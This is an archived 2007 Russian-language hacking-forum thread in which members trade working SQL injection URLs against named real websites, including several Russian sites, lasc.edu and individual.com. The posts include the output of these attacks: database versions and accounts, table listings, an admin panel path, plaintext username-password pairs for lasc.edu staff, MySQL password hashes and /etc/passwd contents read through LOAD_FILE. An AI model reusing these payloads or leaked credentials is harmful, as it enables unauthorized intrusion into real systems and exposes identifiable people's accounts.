Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.10.2007, 18:59
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://opel.avto-city.ru/catalog.php?id=-3+union+select+concat(user(),0x3a,version(),0x3a,database(),0x3a,curdate(),0x3a,now()),2,3,4,5,6,7/*
Вывод
host22931@localhost//4.0.27-log//host22931//2007-10-29// 17:52:53 |
|
|
29.10.2007, 19:34
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.ascon.ru/order.php?id=-1+union+select+0,1,concat_ws(char(58),ID_MEMBER,memberName,passwd,emailAddress),3,4+from+forum.smf_members+limit+0,1/*
|
|
|
|
29.10.2007, 21:06
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.lsg.ru/index.php?page=sexolog&art=-1'+union+select+1,2,concat_ws(0x2F,version(),datab ase(),user()),4,5,6,7,8,9/*
4.1.22-standard/gilboev_44/gilboev_1@localhost
-----------------------------------------------------------------
http://www.beloretsk.ru/news/view.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9,10/*
4.0.27-max-log/beloret/beloret@v4.valuehost.ru
|
|
|
|
29.10.2007, 22:23
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
edu+MSSQL
www.lasc.edu
Код:
_http://www.lasc.edu/main.asp?id=-1'+or+1=@@version--
Version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
User:lasc
DBName:lasc
случайно наткнулся, кому интересно капайте дальше.
|
|
|
|
29.10.2007, 23:47
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.moldova.ru/index.php?tabName=articles&owner=19&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13/*
4.1.19-standard-log/moldova_moldova/moldova_design@sr.dualg.com
-------------------------------------------------------------------
infobank.mossport.ru
http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=@@version
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
DB: casper
User:cabi
http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=(select+top+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(passw+as+nvarchar)+from+tMKSInetUser +where+UserID=1)--
логин/пароль
|
|
|
|
30.10.2007, 00:22
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171
Репутация:
88
|
|
Код:
http://www.llrickard.com/show_details.php?id=1179933989+union+select+1,2,3,4,5,6,7,8,9/*
не выводит таблицы
--------------------------------------------------
Код:
http://www.ewms.ltd.uk/show_details.php?recordID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
version:4.1.22-standard-log
user:
ukbf@server213-171-219-234.livedns.org.uk
DB:
readymade
таблицы: news, users
--------------------------------------------------
Код:
http://www.karakteruitgevers.nl/show_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
Пипец таблиц много
Последний раз редактировалось -MoLoToK-; 30.10.2007 в 00:38..
|
|
|
|
30.10.2007, 01:23
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
случайно наткнулся, кому интересно капайте дальше.
http://www.lasc.edu/admin/ - админка
Таблицы:
'IMPORTprofessors',
'categories',
'classes',
'courses',
'dtproperties',
'extension_tbl',
'files',
'filetype_tbl',
'history_tbl',
'homework',
'IMPORTclasses',
'IMPORTcourses',
'media_tbl',
'OLDclasses','OLDcourses','OLDprofessors',
'professors',
'redirects',
'semesters',
'skyroot',
'subjects',
'sysconstraints',
'syssegments',
'user_rights',
'user_rights_pages',
'users',
'wysiwyg_tbl',
'comd_list',
'D99_Tmp',
'faculty_documents',
'faculty_info',
'faculty_links',
'jiaozhu',
'kill_kk',
'My_Cmd_Tmp2876418714116'
-----
Выводил из users:
Код:
http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)--
chilinma:btsariel*12
larsonl:miriam*12
gallagherm:maryg*12
MageeCL:business*15
medinamr:torres*12
Код:
http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users++where+username+not+in('chilinma','larsonl','gallagherm','MageeCL'))--
----
Дальше капать лень... ^^
Iceangel_
Странную инъекцию сегодня нашел...
http://www.superseeds.com/products.php?cat=27'+union+select+1,2/*
Что в таких случаях надо делать?
А с чего ты взял, что она там вообще есть?
|
|
|
|
30.10.2007, 10:20
|
|
Moderator - Level 7
Регистрация: 23.04.2007
Сообщений: 646
Провел на форуме:
4901399
Репутация:
1035
|
|
Парапсихология - Пути к истине от RIN.RU
http://istina.rin.ru/cgi-bin/print.pl?sait=2&id=-1'+UNION+SELECT+1,2,3/* все читается в заголовке страницы.
user:postcards@192.168.1.234
version:4.0.26
base:ufo
есть доступ в mysql.user но кроме имен ничего не дает
chat, igor, sergey, qmail, по крайней мере я не смог.
прочиталось:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nol
/var/www/html/hosts/nataly/istina/ по моему можно получить шелл, не уверен, только учусь.
в антибояне есть money.rin.ru, state.rin.ru
Последний раз редактировалось Elvis000; 30.10.2007 в 12:03..
|
|
|
|
30.10.2007, 14:14
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
izhbowling.ru
http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9,10/*
4.1.22-STANDARD/IZHBOWLI_DB/IZHBOWLI_US@LOCALHOST
http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_icq),4,5,6,7,8,9,10+from+phpbb_users+l imit+1,1/*
логин/хеш/уин
|
|
|
|
30.10.2007, 14:46
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www.individual.com/
Какая-то крупная контора, что-то вроде своего блога...
http://www.individual.com/newsdesk.php?industry=business'+union+select+1,2,c oncat(user,0x3a,password),4,5,6,7,8+from+mysql.use r/*
Version: 4.0.14-standard-log
User: idc_v3@localhost
mysql.user:
root:7725046d7c65a8e3
idc_v3:7725046d7c65a8e3
s2sys:74b461150a6eacc4
s2user:3761b1e6152af41e
ftlc:4e2d333721893319
http://www.individual.com/newsdesk.php?industry=business'+union+select+1,2,L OAD_FILE('/etc/passwd'),4,5,6,7,8/*
Есть табла account в ней нащупал только одну колонку - passwd, но не могу найти колонку с логинами...
http://www.individual.com/newsdesk.php?industry=business'+union+select+1,2,p asswd,4,5,6,7,8+from+account/*
Количество юзверей впечатляет +/- 25 000
Последний раз редактировалось 0nep@t0p; 30.10.2007 в 17:51..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.gif){kind=avatar}
![Отправить сообщение для K1nD[e]R с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Линейный вид
